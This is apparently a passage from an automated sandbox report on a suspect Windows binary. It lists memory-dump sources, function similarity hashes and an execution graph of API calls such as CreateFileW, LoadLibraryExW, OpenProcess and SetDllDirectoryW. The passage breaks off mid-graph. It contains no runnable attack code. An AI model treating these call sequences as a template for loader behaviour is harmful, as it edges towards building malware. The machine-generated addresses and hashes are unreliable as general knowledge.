                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                  • Opcode ID: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction ID: d76ea8df63dd340db1c9884cfa7e5192e38e50dc456a34cc7c7c5ba757158770
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A312D66A1C6C686D730DB64E4983ABB3A1FB94700F500136D68DC7A9CEF3DC40ACB04
                                                                                                                                                                                                                                  Function 00007FF65D6F1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                                  • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction ID: 1069e6100c339c97ceebde34e68ebc66ec31781d1c3b0207e1ab88a3beccd842
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63E0E531D1DE83C2DA209B10F88832963A0FB84744F940131E98E926ECEF3CD95ADB00
                                                                                                                                                                                                                                  Function 00007FF65D6F2F34 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F38FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F3935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F3948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65D6F3A71), ref: 00007FF65D6F395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF65D6F10D8: OpenProcess.KERNEL32 ref: 00007FF65D6F10FC
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF65D6F2FCF
                                                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF65D6F2FE2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$HeapProcess$CreateDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                                  • API String ID: 3579246950-2286007224
                                                                                                                                                                                                                                  • Opcode ID: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction ID: 8a2f88d56975333f28e5295af59c0a4be210d47566c994d50327ee3e98dc9dac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4211D6A0E1CF8381E710DB54F8443A673A0FB88744F484175D54CE66ADEF7CE08AAB41

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:9.5%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.5%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:60
                                                                                                                                                                                                                                  execution_graph 19207 7ff79daf09c0 19218 7ff79daf66f4 19207->19218 19219 7ff79daf6701 19218->19219 19220 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19219->19220 19221 7ff79daf671d 19219->19221 19220->19219 19222 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19221->19222 19223 7ff79daf09c9 19221->19223 19222->19221 19224 7ff79daef5e8 EnterCriticalSection 19223->19224 18335 7ff79dae4938 18336 7ff79dae496f 18335->18336 18337 7ff79dae4952 18335->18337 18336->18337 18339 7ff79dae4982 CreateFileW 18336->18339 18338 7ff79dae43d4 _fread_nolock 11 API calls 18337->18338 18340 7ff79dae4957 18338->18340 18341 7ff79dae49b6 18339->18341 18342 7ff79dae49ec 18339->18342 18345 7ff79dae43f4 _get_daylight 11 API calls 18340->18345 18360 7ff79dae4a8c GetFileType 18341->18360 18386 7ff79dae4f14 18342->18386 18348 7ff79dae495f 18345->18348 18353 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18348->18353 18349 7ff79dae49e1 CloseHandle 18354 7ff79dae496a 18349->18354 18350 7ff79dae49cb CloseHandle 18350->18354 18351 7ff79dae49f5 18355 7ff79dae4368 _fread_nolock 11 API calls 18351->18355 18352 7ff79dae4a20 18407 7ff79dae4cd4 18352->18407 18353->18354 18359 7ff79dae49ff 18355->18359 18359->18354 18361 7ff79dae4b97 18360->18361 18362 7ff79dae4ada 18360->18362 18364 7ff79dae4b9f 18361->18364 18365 7ff79dae4bc1 18361->18365 18363 7ff79dae4b06 GetFileInformationByHandle 18362->18363 18367 7ff79dae4e10 21 API calls 18362->18367 18368 7ff79dae4b2f 18363->18368 18369 7ff79dae4bb2 GetLastError 18363->18369 18364->18369 18370 7ff79dae4ba3 18364->18370 18366 7ff79dae4be4 PeekNamedPipe 18365->18366 18376 7ff79dae4b82 18365->18376 18366->18376 18372 7ff79dae4af4 18367->18372 18373 7ff79dae4cd4 51 API calls 18368->18373 18371 7ff79dae4368 _fread_nolock 11 API calls 18369->18371 18374 7ff79dae43f4 _get_daylight 11 API calls 18370->18374 18371->18376 18372->18363 18372->18376 18375 7ff79dae4b3a 18373->18375 18374->18376 18424 7ff79dae4c34 18375->18424 18377 7ff79dadb870 _log10_special 8 API calls 18376->18377 18379 7ff79dae49c4 18377->18379 18379->18349 18379->18350 18381 7ff79dae4c34 10 API calls 18382 7ff79dae4b59 18381->18382 18383 7ff79dae4c34 10 API calls 18382->18383 18384 7ff79dae4b6a 18383->18384 18384->18376 18385 7ff79dae43f4 _get_daylight 11 API calls 18384->18385 18385->18376 18387 7ff79dae4f4a 18386->18387 18388 7ff79dae4fe2 __vcrt_freefls 18387->18388 18389 7ff79dae43f4 _get_daylight 11 API calls 18387->18389 18390 7ff79dadb870 _log10_special 8 API calls 18388->18390 18391 7ff79dae4f5c 18389->18391 18392 7ff79dae49f1 18390->18392 18393 7ff79dae43f4 _get_daylight 11 API calls 18391->18393 18392->18351 18392->18352 18394 7ff79dae4f64 18393->18394 18395 7ff79dae7118 45 API calls 18394->18395 18396 7ff79dae4f79 18395->18396 18397 7ff79dae4f81 18396->18397 18398 7ff79dae4f8b 18396->18398 18400 7ff79dae43f4 _get_daylight 11 API calls 18397->18400 18399 7ff79dae43f4 _get_daylight 11 API calls 18398->18399 18401 7ff79dae4f90 18399->18401 18406 7ff79dae4f86 18400->18406 18401->18388 18402 7ff79dae43f4 _get_daylight 11 API calls 18401->18402 18403 7ff79dae4f9a 18402->18403 18404 7ff79dae7118 45 API calls 18403->18404 18404->18406 18405 7ff79dae4fd4 GetDriveTypeW 18405->18388 18406->18388 18406->18405 18409 7ff79dae4cfc 18407->18409 18408 7ff79dae4a2d 18417 7ff79dae4e10 18408->18417 18409->18408 18431 7ff79daeea34 18409->18431 18411 7ff79dae4d90 18411->18408 18412 7ff79daeea34 51 API calls 18411->18412 18413 7ff79dae4da3 18412->18413 18413->18408 18414 7ff79daeea34 51 API calls 18413->18414 18415 7ff79dae4db6 18414->18415 18415->18408 18416 7ff79daeea34 51 API calls 18415->18416 18416->18408 18418 7ff79dae4e2a 18417->18418 18419 7ff79dae4e61 18418->18419 18420 7ff79dae4e3a 18418->18420 18421 7ff79daee8c8 21 API calls 18419->18421 18422 7ff79dae4368 _fread_nolock 11 API calls 18420->18422 18423 7ff79dae4e4a 18420->18423 18421->18423 18422->18423 18423->18359 18425 7ff79dae4c50 18424->18425 18426 7ff79dae4c5d FileTimeToSystemTime 18424->18426 18425->18426 18429 7ff79dae4c58 18425->18429 18427 7ff79dae4c71 SystemTimeToTzSpecificLocalTime 18426->18427 18426->18429 18427->18429 18428 7ff79dadb870 _log10_special 8 API calls 18430 7ff79dae4b49 18428->18430 18429->18428 18430->18381 18432 7ff79daeea41 18431->18432 18433 7ff79daeea65 18431->18433 18432->18433 18434 7ff79daeea46 18432->18434 18435 7ff79daeea9f 18433->18435 18439 7ff79daeeabe 18433->18439 18436 7ff79dae43f4 _get_daylight 11 API calls 18434->18436 18438 7ff79dae43f4 _get_daylight 11 API calls 18435->18438 18437 7ff79daeea4b 18436->18437 18440 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18437->18440 18441 7ff79daeeaa4 18438->18441 18442 7ff79dae4178 45 API calls 18439->18442 18443 7ff79daeea56 18440->18443 18444 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18441->18444 18447 7ff79daeeacb 18442->18447 18443->18411 18446 7ff79daeeaaf 18444->18446 18445 7ff79daef7ec 51 API calls 18445->18447 18446->18411 18447->18445 18447->18446 19860 7ff79daeb830 19871 7ff79daef5e8 EnterCriticalSection 19860->19871 19875 7ff79dae4720 19876 7ff79dae472b 19875->19876 19884 7ff79daee5b4 19876->19884 19897 7ff79daef5e8 EnterCriticalSection 19884->19897 19498 7ff79daeec9c 19499 7ff79daeee8e 19498->19499 19501 7ff79daeecde _isindst 19498->19501 19500 7ff79dae43f4 _get_daylight 11 API calls 19499->19500 19518 7ff79daeee7e 19500->19518 19501->19499 19504 7ff79daeed5e _isindst 19501->19504 19502 7ff79dadb870 _log10_special 8 API calls 19503 7ff79daeeea9 19502->19503 19519 7ff79daf54a4 19504->19519 19509 7ff79daeeeba 19511 7ff79dae9c10 _isindst 17 API calls 19509->19511 19513 7ff79daeeece 19511->19513 19516 7ff79daeedbb 19516->19518 19543 7ff79daf54e8 19516->19543 19518->19502 19520 7ff79daf54b3 19519->19520 19524 7ff79daeed7c 19519->19524 19550 7ff79daef5e8 EnterCriticalSection 19520->19550 19525 7ff79daf48a8 19524->19525 19526 7ff79daf48b1 19525->19526 19527 7ff79daeed91 19525->19527 19528 7ff79dae43f4 _get_daylight 11 API calls 19526->19528 19527->19509 19531 7ff79daf48d8 19527->19531 19529 7ff79daf48b6 19528->19529 19530 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 19529->19530 19530->19527 19532 7ff79daf48e1 19531->19532 19533 7ff79daeeda2 19531->19533 19534 7ff79dae43f4 _get_daylight 11 API calls 19532->19534 19533->19509 19537 7ff79daf4908 19533->19537 19535 7ff79daf48e6 19534->19535 19536 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 19535->19536 19536->19533 19538 7ff79daf4911 19537->19538 19539 7ff79daeedb3 19537->19539 19540 7ff79dae43f4 _get_daylight 11 API calls 19538->19540 19539->19509 19539->19516 19541 7ff79daf4916 19540->19541 19542 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 19541->19542 19542->19539 19551 7ff79daef5e8 EnterCriticalSection 19543->19551 19553 7ff79dafa10e 19554 7ff79dafa11d 19553->19554 19555 7ff79dafa127 19553->19555 19557 7ff79daef648 LeaveCriticalSection 19554->19557 15623 7ff79dadae00 15624 7ff79dadae2e 15623->15624 15625 7ff79dadae15 15623->15625 15625->15624 15628 7ff79daec90c 15625->15628 15629 7ff79daec957 15628->15629 15633 7ff79daec91b _get_daylight 15628->15633 15638 7ff79dae43f4 15629->15638 15631 7ff79daec93e HeapAlloc 15632 7ff79dadae8e 15631->15632 15631->15633 15633->15629 15633->15631 15635 7ff79daf28a0 15633->15635 15641 7ff79daf28e0 15635->15641 15647 7ff79daea5d8 GetLastError 15638->15647 15640 7ff79dae43fd 15640->15632 15646 7ff79daef5e8 EnterCriticalSection 15641->15646 15648 7ff79daea619 FlsSetValue 15647->15648 15652 7ff79daea5fc 15647->15652 15649 7ff79daea62b 15648->15649 15653 7ff79daea609 SetLastError 15648->15653 15664 7ff79daedea8 15649->15664 15652->15648 15652->15653 15653->15640 15655 7ff79daea658 FlsSetValue 15658 7ff79daea676 15655->15658 15659 7ff79daea664 FlsSetValue 15655->15659 15656 7ff79daea648 FlsSetValue 15657 7ff79daea651 15656->15657 15671 7ff79dae9c58 15657->15671 15677 7ff79daea204 15658->15677 15659->15657 15669 7ff79daedeb9 _get_daylight 15664->15669 15665 7ff79daedf0a 15668 7ff79dae43f4 _get_daylight 10 API calls 15665->15668 15666 7ff79daedeee HeapAlloc 15667 7ff79daea63a 15666->15667 15666->15669 15667->15655 15667->15656 15668->15667 15669->15665 15669->15666 15670 7ff79daf28a0 _get_daylight 2 API calls 15669->15670 15670->15669 15672 7ff79dae9c8c 15671->15672 15673 7ff79dae9c5d RtlFreeHeap 15671->15673 15672->15653 15673->15672 15674 7ff79dae9c78 GetLastError 15673->15674 15675 7ff79dae9c85 Concurrency::details::SchedulerProxy::DeleteThis 15674->15675 15676 7ff79dae43f4 _get_daylight 9 API calls 15675->15676 15676->15672 15682 7ff79daea0dc 15677->15682 15694 7ff79daef5e8 EnterCriticalSection 15682->15694 18448 7ff79dae8c79 18449 7ff79dae96e8 45 API calls 18448->18449 18450 7ff79dae8c7e 18449->18450 18451 7ff79dae8ca5 GetModuleHandleW 18450->18451 18452 7ff79dae8cef 18450->18452 18451->18452 18458 7ff79dae8cb2 18451->18458 18460 7ff79dae8b7c 18452->18460 18458->18452 18474 7ff79dae8da0 GetModuleHandleExW 18458->18474 18480 7ff79daef5e8 EnterCriticalSection 18460->18480 18475 7ff79dae8dd4 GetProcAddress 18474->18475 18476 7ff79dae8dfd 18474->18476 18477 7ff79dae8de6 18475->18477 18478 7ff79dae8e02 FreeLibrary 18476->18478 18479 7ff79dae8e09 18476->18479 18477->18476 18478->18479 18479->18452 20025 7ff79dafa079 20028 7ff79dae4788 LeaveCriticalSection 20025->20028 19630 7ff79daf9ef3 19632 7ff79daf9f03 19630->19632 19634 7ff79dae4788 LeaveCriticalSection 19632->19634 20029 7ff79dadbe70 20030 7ff79dadbe80 20029->20030 20046 7ff79dae8ec0 20030->20046 20032 7ff79dadbe8c 20052 7ff79dadc168 20032->20052 20034 7ff79dadc44c 7 API calls 20036 7ff79dadbf25 20034->20036 20035 7ff79dadbea4 _RTC_Initialize 20044 7ff79dadbef9 20035->20044 20057 7ff79dadc318 20035->20057 20038 7ff79dadbeb9 20060 7ff79dae832c 20038->20060 20044->20034 20045 7ff79dadbf15 20044->20045 20047 7ff79dae8ed1 20046->20047 20048 7ff79dae43f4 _get_daylight 11 API calls 20047->20048 20051 7ff79dae8ed9 20047->20051 20049 7ff79dae8ee8 20048->20049 20050 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 20049->20050 20050->20051 20051->20032 20053 7ff79dadc179 20052->20053 20056 7ff79dadc17e __scrt_acquire_startup_lock 20052->20056 20054 7ff79dadc44c 7 API calls 20053->20054 20053->20056 20055 7ff79dadc1f2 20054->20055 20056->20035 20085 7ff79dadc2dc 20057->20085 20059 7ff79dadc321 20059->20038 20061 7ff79dae834c 20060->20061 20083 7ff79dadbec5 20060->20083 20062 7ff79dae8354 20061->20062 20063 7ff79dae836a GetModuleFileNameW 20061->20063 20064 7ff79dae43f4 _get_daylight 11 API calls 20062->20064 20067 7ff79dae8395 20063->20067 20065 7ff79dae8359 20064->20065 20066 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 20065->20066 20066->20083 20068 7ff79dae82cc 11 API calls 20067->20068 20069 7ff79dae83d5 20068->20069 20070 7ff79dae83f5 20069->20070 20071 7ff79dae83dd 20069->20071 20075 7ff79dae8417 20070->20075 20077 7ff79dae8443 20070->20077 20078 7ff79dae845c 20070->20078 20072 7ff79dae43f4 _get_daylight 11 API calls 20071->20072 20073 7ff79dae83e2 20072->20073 20074 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20073->20074 20074->20083 20076 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20075->20076 20076->20083 20079 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20077->20079 20080 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20078->20080 20081 7ff79dae844c 20079->20081 20080->20075 20082 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20081->20082 20082->20083 20083->20044 20084 7ff79dadc3ec InitializeSListHead 20083->20084 20086 7ff79dadc2f6 20085->20086 20087 7ff79dadc2ef 20085->20087 20089 7ff79dae94fc 20086->20089 20087->20059 20092 7ff79dae9138 20089->20092 20099 7ff79daef5e8 EnterCriticalSection 20092->20099 19707 7ff79daea2e0 19708 7ff79daea2e5 19707->19708 19709 7ff79daea2fa 19707->19709 19713 7ff79daea300 19708->19713 19714 7ff79daea342 19713->19714 19715 7ff79daea34a 19713->19715 19716 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19714->19716 19717 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19715->19717 19716->19715 19718 7ff79daea357 19717->19718 19719 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19718->19719 19720 7ff79daea364 19719->19720 19721 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19720->19721 19722 7ff79daea371 19721->19722 19723 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19722->19723 19724 7ff79daea37e 19723->19724 19725 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19724->19725 19726 7ff79daea38b 19725->19726 19727 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19726->19727 19728 7ff79daea398 19727->19728 19729 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19728->19729 19730 7ff79daea3a5 19729->19730 19731 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19730->19731 19732 7ff79daea3b5 19731->19732 19733 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19732->19733 19734 7ff79daea3c5 19733->19734 19739 7ff79daea1a4 19734->19739 19753 7ff79daef5e8 EnterCriticalSection 19739->19753 20167 7ff79dae9060 20170 7ff79dae8fe4 20167->20170 20177 7ff79daef5e8 EnterCriticalSection 20170->20177 15696 7ff79dadbf5c 15717 7ff79dadc12c 15696->15717 15699 7ff79dadc0a8 15840 7ff79dadc44c IsProcessorFeaturePresent 15699->15840 15700 7ff79dadbf78 __scrt_acquire_startup_lock 15702 7ff79dadc0b2 15700->15702 15709 7ff79dadbf96 __scrt_release_startup_lock 15700->15709 15703 7ff79dadc44c 7 API calls 15702->15703 15705 7ff79dadc0bd __FrameHandler3::FrameUnwindToEmptyState 15703->15705 15704 7ff79dadbfbb 15706 7ff79dadc041 15723 7ff79dadc594 15706->15723 15708 7ff79dadc046 15726 7ff79dad1000 15708->15726 15709->15704 15709->15706 15829 7ff79dae8e44 15709->15829 15714 7ff79dadc069 15714->15705 15836 7ff79dadc2b0 15714->15836 15718 7ff79dadc134 15717->15718 15719 7ff79dadc140 __scrt_dllmain_crt_thread_attach 15718->15719 15720 7ff79dadc14d 15719->15720 15722 7ff79dadbf70 15719->15722 15720->15722 15847 7ff79dadcba8 15720->15847 15722->15699 15722->15700 15874 7ff79daf97e0 15723->15874 15727 7ff79dad1009 15726->15727 15876 7ff79dae4794 15727->15876 15729 7ff79dad352b 15883 7ff79dad33e0 15729->15883 15736 7ff79dad3736 16083 7ff79dad3f70 15736->16083 15737 7ff79dad356c 15739 7ff79dad1bf0 49 API calls 15737->15739 15755 7ff79dad3588 15739->15755 15741 7ff79dad3785 15743 7ff79dad25f0 53 API calls 15741->15743 15820 7ff79dad3538 15743->15820 15745 7ff79dad3778 15747 7ff79dad379f 15745->15747 15748 7ff79dad377d 15745->15748 15746 7ff79dad365f __vcrt_freefls 15749 7ff79dad3834 15746->15749 15753 7ff79dad7e10 14 API calls 15746->15753 15751 7ff79dad1bf0 49 API calls 15747->15751 16102 7ff79dadf36c 15748->16102 15785 7ff79dad3805 __vcrt_freefls 15749->15785 16106 7ff79dad3e90 15749->16106 15752 7ff79dad37be 15751->15752 15761 7ff79dad18f0 115 API calls 15752->15761 15756 7ff79dad36ae 15753->15756 15945 7ff79dad7e10 15755->15945 15958 7ff79dad7f80 15756->15958 15757 7ff79dad3852 15759 7ff79dad3865 15757->15759 15760 7ff79dad3871 15757->15760 16109 7ff79dad3fe0 15759->16109 15764 7ff79dad1bf0 49 API calls 15760->15764 15765 7ff79dad37df 15761->15765 15762 7ff79dad36bd 15766 7ff79dad380f 15762->15766 15768 7ff79dad36cf 15762->15768 15764->15785 15765->15755 15767 7ff79dad37ef 15765->15767 15967 7ff79dad8400 15766->15967 15771 7ff79dad25f0 53 API calls 15767->15771 15963 7ff79dad1bf0 15768->15963 15771->15820 15774 7ff79dad389e SetDllDirectoryW 15778 7ff79dad38c3 15774->15778 15780 7ff79dad3a50 15778->15780 16023 7ff79dad6560 15778->16023 15779 7ff79dad36fc 16063 7ff79dad25f0 15779->16063 15783 7ff79dad3a5a PostMessageW GetMessageW 15780->15783 15786 7ff79dad3a7d 15780->15786 15783->15786 16018 7ff79dad86b0 15785->16018 16167 7ff79dad3080 15786->16167 15788 7ff79dad38ea 15790 7ff79dad3947 15788->15790 15792 7ff79dad3901 15788->15792 16112 7ff79dad65a0 15788->16112 15790->15780 15798 7ff79dad395c 15790->15798 15804 7ff79dad3905 15792->15804 16133 7ff79dad6970 15792->16133 16043 7ff79dad30e0 15798->16043 15799 7ff79dad6780 FreeLibrary 15802 7ff79dad3aa3 15799->15802 15804->15790 16149 7ff79dad2870 15804->16149 16074 7ff79dadb870 15820->16074 15830 7ff79dae8e5b 15829->15830 15831 7ff79dae8e7c 15829->15831 15830->15706 18286 7ff79dae96e8 15831->18286 15834 7ff79dadc5d8 GetModuleHandleW 15835 7ff79dadc5e9 15834->15835 15835->15714 15837 7ff79dadc2c1 15836->15837 15838 7ff79dadc080 15837->15838 15839 7ff79dadcba8 7 API calls 15837->15839 15838->15704 15839->15838 15841 7ff79dadc472 memcpy_s __FrameHandler3::FrameUnwindToEmptyState 15840->15841 15842 7ff79dadc491 RtlCaptureContext RtlLookupFunctionEntry 15841->15842 15843 7ff79dadc4f6 memcpy_s 15842->15843 15844 7ff79dadc4ba RtlVirtualUnwind 15842->15844 15845 7ff79dadc528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15843->15845 15844->15843 15846 7ff79dadc576 __FrameHandler3::FrameUnwindToEmptyState 15845->15846 15846->15702 15848 7ff79dadcbb0 15847->15848 15849 7ff79dadcbba 15847->15849 15853 7ff79dadcf44 15848->15853 15849->15722 15854 7ff79dadcf53 15853->15854 15855 7ff79dadcbb5 15853->15855 15861 7ff79dadd180 15854->15861 15857 7ff79dadcfb0 15855->15857 15858 7ff79dadcfdb 15857->15858 15859 7ff79dadcfdf 15858->15859 15860 7ff79dadcfbe DeleteCriticalSection 15858->15860 15859->15849 15860->15858 15865 7ff79dadcfe8 15861->15865 15866 7ff79dadd0d2 TlsFree 15865->15866 15872 7ff79dadd02c __vcrt_FlsAlloc 15865->15872 15867 7ff79dadd05a LoadLibraryExW 15869 7ff79dadd07b GetLastError 15867->15869 15870 7ff79dadd0f9 15867->15870 15868 7ff79dadd119 GetProcAddress 15868->15866 15869->15872 15870->15868 15871 7ff79dadd110 FreeLibrary 15870->15871 15871->15868 15872->15866 15872->15867 15872->15868 15873 7ff79dadd09d LoadLibraryExW 15872->15873 15873->15870 15873->15872 15875 7ff79dadc5ab GetStartupInfoW 15874->15875 15875->15708 15879 7ff79daee790 15876->15879 15877 7ff79daee7e3 16180 7ff79dae9b24 15877->16180 15879->15877 15880 7ff79daee836 15879->15880 16190 7ff79daee668 15880->16190 15882 7ff79daee80c 15882->15729 16236 7ff79dadbb70 15883->16236 15886 7ff79dad341b 16243 7ff79dad29e0 15886->16243 15887 7ff79dad3438 16238 7ff79dad85a0 FindFirstFileExW 15887->16238 15891 7ff79dad34a5 16262 7ff79dad8760 15891->16262 15892 7ff79dad344b 16253 7ff79dad8620 CreateFileW 15892->16253 15894 7ff79dadb870 _log10_special 8 API calls 15897 7ff79dad34dd 15894->15897 15896 7ff79dad34b3 15900 7ff79dad26c0 49 API calls 15896->15900 15903 7ff79dad342e 15896->15903 15897->15820 15905 7ff79dad18f0 15897->15905 15899 7ff79dad345c 16256 7ff79dad26c0 15899->16256 15900->15903 15902 7ff79dad3474 __vcrt_FlsAlloc 15902->15891 15903->15894 15906 7ff79dad3f70 108 API calls 15905->15906 15907 7ff79dad1925 15906->15907 15908 7ff79dad1bb6 15907->15908 15909 7ff79dad76a0 83 API calls 15907->15909 15910 7ff79dadb870 _log10_special 8 API calls 15908->15910 15911 7ff79dad196b 15909->15911 15912 